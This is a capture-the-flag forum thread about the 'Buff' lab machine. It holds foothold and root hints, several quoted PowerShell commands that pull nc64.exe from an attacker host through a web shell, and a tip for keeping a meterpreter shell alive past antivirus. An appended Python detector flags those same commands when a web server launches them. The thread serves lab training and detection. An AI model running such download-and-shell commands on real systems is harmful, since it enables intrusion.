Official Buff Discussion

Compared to other ‘Easy’ machines this was quite different! I think this box would be easy for those who are familiar with certain tools and quite challenging for those who are not, which was my case. Thanks to @MariaB for their help.

A lot of the comments already on the forum will help you. I want to reiterate the tips for foothold, don’t dismiss what is in front of you, enumerate everything but don’t be drawn into a rabbit hole.

For root, I could not find anything on the box to help me move forward, but once you understand what to do there are tools out there that can help.

Finally!
whoami
buff\administrator

I enjoyed this machine quite a bit. Searching for an exploit was a PITA because everything tells you “it is one time job”. Apparently it is not.
I also struggled a bit with ssh. I forgot that in Parrot the ssh service is disabled by default. I was banging my head against the wall wondering why my p****.*** was not connecting…
Thanks @egotisticalSW for a nice machine and @TazWake for your invaluable support and thorough comments.

Got the initial web shell but not able to upgrade it. Tried downloading nc.exe for reverse shell but did not work… can anyone nudge me in the right direction…

@sparrow1 said:

I enjoyed this machine quite a bit. Searching for an exploit was a PITA because everything tells you “it is one time job”. Apparently it is not.
I also struggled a bit with ssh. I forgot that in Parrot the ssh service is disabled by default. I was banging my head against the wall wondering why my p****.*** was not connecting…

Yeah, I think this has tripped up a few people. I was fortunate in that a few retired boxes have needed port forwarding like this, so I remembered to turn it on :smile:

Thanks @egotisticalSW for a nice machine and @TazWake for your invaluable support and thorough comments.

Glad you got it.

@meb22f102 said:

Got the initial web shell but not able to upgrade it. Tried downloading nc.exe for reverse shell but did not work… can anyone nudge me in the right direction…

Did you try a different port?

Can anybody help with AV? I get a root shell with meterpreter but it dies immediately.

Reverse nc connection not dropping in. Anyone fancy giving a helping hand, please?

@Equity said:

Reverse nc connection not dropping in. Anyone fancy giving a helping hand, please?

nevermind

@VoltK said:

Can anybody help with AV? I get a root shell with meterpreter but it dies immediately.

I had the same problem and switched to the non-staged shell_ variant.

What is a surefire way to get a file onto the remote machine via a webshell? If I don’t run with powershell.exe before the command it says the command is not recognized, so is the webshell not actually talking to powershell? If I run it with the powershell.exe I get an error saying the machine can’t connect to my remote server, which I’m hosting with python. I can ping my attack machine so I know the IP is correct and the interface is working, but I’m still unsure what is happening.

I have tried the following:

IEX (New-Object System.Net.WebClient).DownloadFile('http://10.10.xx.xx/nc64.exe', 'nc64.exe')

Invoke-WebRequest -Uri 'http://10.10.xx.xx/nc64.exe' -OutFile 'nc64.exe'

powershell.exe wget http://10.10.xx.xx/nc64.exe

Invoke-WebRequest should work. Try a full path in the -outfile

@lovesay said:

What is a surefire way to get a file onto the remote machine via a webshell? If I don’t run with powershell.exe before the command it says the command is not recognized, so is the webshell not actually talking to powershell? If I run it with the powershell.exe I get an error saying the machine can’t connect to my remote server, which I’m hosting with python. I can ping my attack machine so I know the IP is correct and the interface is working, but I’m still unsure what is happening.

I have tried the following:

IEX (New-Object System.Net.WebClient).DownloadFile('http://10.10.xx.xx/nc64.exe', 'nc64.exe')

Invoke-WebRequest -Uri 'http://10.10.xx.xx/nc64.exe' -OutFile 'nc64.exe'

powershell.exe wget http://10.10.xx.xx/nc64.exe

What command do you use to copy stuff on your own terminal?

@Phrenesis2k said:

Invoke-WebRequest should work. Try a full path in the -outfile

That was it, so it seems. Thank you so much. The issue now is some kind of lag that causes the file not to be downloaded. It shows the file in the remote machine’s directory but with size 0. I assume this is a network issue.

Update: Running a personal VPN on top of OpenVPN seems to cause some issues.

@KobashigawaBR said:

@lovesay said:

What is a surefire way to get a file onto the remote machine via a webshell? If I don’t run with powershell.exe before the command it says the command is not recognized, so is the webshell not actually talking to powershell? If I run it with the powershell.exe I get an error saying the machine can’t connect to my remote server, which I’m hosting with python. I can ping my attack machine so I know the IP is correct and the interface is working, but I’m still unsure what is happening.

I have tried the following:

IEX (New-Object System.Net.WebClient).DownloadFile('http://10.10.xx.xx/nc64.exe', 'nc64.exe')

Invoke-WebRequest -Uri 'http://10.10.xx.xx/nc64.exe' -OutFile 'nc64.exe'

powershell.exe wget http://10.10.xx.xx/nc64.exe

What command do you use to copy stuff on your own terminal?

wget typically.

@lovesay said:

What is a surefire way to get a file onto the remote machine via a webshell? If I don’t run with powershell.exe before the command it says the command is not recognized, so is the webshell not actually talking to powershell? If I run it with the powershell.exe I get an error saying the machine can’t connect to my remote server, which I’m hosting with python. I can ping my attack machine so I know the IP is correct and the interface is working, but I’m still unsure what is happening.

Depending on the exploit you used, you can use commands in the browser to download files to the machine in the directory where your shell landed. You can also use this to execute them. There are cross-platform tools designed for manipulating servers.

@lovesay said:

What is a surefire way to get a file onto the remote machine via a webshell? If I don’t run with powershell.exe before the command it says the command is not recognized, so is the webshell not actually talking to powershell? If I run it with the powershell.exe I get an error saying the machine can’t connect to my remote server, which I’m hosting with python. I can ping my attack machine so I know the IP is correct and the interface is working, but I’m still unsure what is happening.

I have tried the following:

IEX (New-Object System.Net.WebClient).DownloadFile('http://10.10.xx.xx/nc64.exe', 'nc64.exe')

Invoke-WebRequest -Uri 'http://10.10.xx.xx/nc64.exe' -OutFile 'nc64.exe'

powershell.exe wget http://10.10.xx.xx/nc64.exe

And the curl command?.. Directly from the directory where your shell landed.

Smbserver is also a great way to move files to the target.

Can someone give me a nudge please? I believe I am stuck on root with the /a***n page. I have not gotten user yet.

@orc said:

Can someone give me a nudge please? I believe I am stuck on root with the /a***n page. I have not gotten user yet.

Look at a different page. Gather information and see what you can do with it.

@choupit0 said:

@lovesay said:

What is a surefire way to get a file onto the remote machine via a webshell? If I don’t run with powershell.exe before the command it says the command is not recognized, so is the webshell not actually talking to powershell? If I run it with the powershell.exe I get an error saying the machine can’t connect to my remote server, which I’m hosting with python. I can ping my attack machine so I know the IP is correct and the interface is working, but I’m still unsure what is happening.

I have tried the following:

IEX (New-Object System.Net.WebClient).DownloadFile('http://10.10.xx.xx/nc64.exe', 'nc64.exe')

Invoke-WebRequest -Uri 'http://10.10.xx.xx/nc64.exe' -OutFile 'nc64.exe'

powershell.exe wget http://10.10.xx.xx/nc64.exe

And the curl command?.. Directly from the directory where your shell landed.

Yeah that works too. Thanks for the insight. I’m just glad I was able to confirm that these commands should work when input correctly rather than thinking it was something else.
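
A defender's view of the three download commands quoted in this thread, as an added example that is not part of any post: it scans process-creation events for those command shapes and keeps the ones launched by a web-server process. The event layout, the `WEB_PARENTS` list, the function names and the parent paths are assumptions made for the example; the sample events are constructed.

```python
import re

WEB_PARENTS = {"httpd.exe", "php-cgi.exe", "w3wp.exe", "nginx.exe"}  # assumed list
# Forum and document software often turns quotes curly; normalise before matching.
QUOTES = str.maketrans({"‘": "'", "’": "'", "“": '"', "”": '"'})
URL = re.compile(r"https?://[^\s'\",)]+", re.I)
FETCH = re.compile(r"\.DownloadFile\(|\b(?:Invoke-WebRequest|iwr|wget|curl)\b", re.I)
OUTFILE = re.compile(r"-OutFile\s+['\"]?([^'\"\s]+)", re.I)
DL_DEST = re.compile(r"\.DownloadFile\([^,]+,\s*['\"]([^'\"]+)['\"]", re.I)
ABSOLUTE = re.compile(r"[A-Za-z]:\\|\\\\")  # drive letter or UNC prefix

# Constructed process-creation events: (parent image, command line).
EVENTS = [
    (r"C:\srv\web\httpd.exe", "powershell.exe IEX (New-Object System.Net.WebClient)"
                              ".DownloadFile(‘http://10.10.xx.xx/nc64.exe’, ‘nc64.exe’)"),
    (r"C:\srv\web\httpd.exe", "powershell.exe Invoke-WebRequest -Uri "
                              "'http://10.10.xx.xx/nc64.exe’-OutFile ‘nc64.exe’"),
    (r"C:\srv\web\httpd.exe", "powershell.exe wget http://10.10.xx.xx/nc64.exe"),
    (r"C:\Windows\explorer.exe", r"powershell.exe Invoke-WebRequest -Uri "
                                 r"http://10.10.xx.xx/nc64.exe -OutFile C:\Temp\nc64.exe"),
    (r"C:\srv\web\httpd.exe", "cmd.exe /c whoami"),
]

def inspect_command(parent_image, command_line):
    """Return a finding dict if the command line fetches a remote file, else None."""
    cmd = command_line.translate(QUOTES)
    fetch, url = FETCH.search(cmd), URL.search(cmd)
    if not (fetch and url):
        return None
    dest = OUTFILE.search(cmd) or DL_DEST.search(cmd)
    dest = dest.group(1) if dest else None
    return {
        "method": fetch.group(0).strip(".(").lower(),
        "url": url.group(0),
        "dest": dest,
        # A relative destination lands in the spawning process's working directory.
        "dest_relative": bool(dest) and not ABSOLUTE.match(dest),
        "web_parent": parent_image.rsplit("\\", 1)[-1].lower() in WEB_PARENTS,
    }

def triage(events):
    """Keep only remote fetches launched by a web-server process."""
    findings = (inspect_command(parent, cmd) for parent, cmd in events)
    return [f for f in findings if f and f["web_parent"]]

if __name__ == "__main__":
    for finding in triage(EVENTS):
        print(finding)
```
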